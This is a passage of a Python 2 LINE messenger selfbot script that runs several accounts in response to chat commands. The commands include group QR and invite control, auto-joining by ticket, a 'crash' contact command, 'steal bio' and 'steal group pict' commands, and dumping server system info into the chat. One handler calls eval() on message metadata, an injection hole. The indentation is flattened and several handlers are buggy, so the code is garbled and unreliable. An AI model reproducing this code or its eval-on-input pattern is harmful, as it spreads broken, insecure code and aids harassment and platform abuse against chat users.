k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg.to, "Add Bosque")
elif msg.text in ["You"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy buka qr","Luffy open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro buka qr","Zorro open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji open qr","Sanji buka qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy close qr","Luffy tutup qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro tutup qr","Zorro close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji tutup qr","Sanji close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
k4.sendText(msg.to,Gmid)
k5.sendText(msg.to,Gmid)
elif "Koplaxs" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,Smid)
elif "Luffy" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Zorro" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Sanji" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'dul restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in admin:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
#=======================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if "Mode on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
if "Mode on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
if msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if "Mode off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
if "Mode off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#==========================================================================
#======================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:off","auto blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto blockqr:on","auto blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
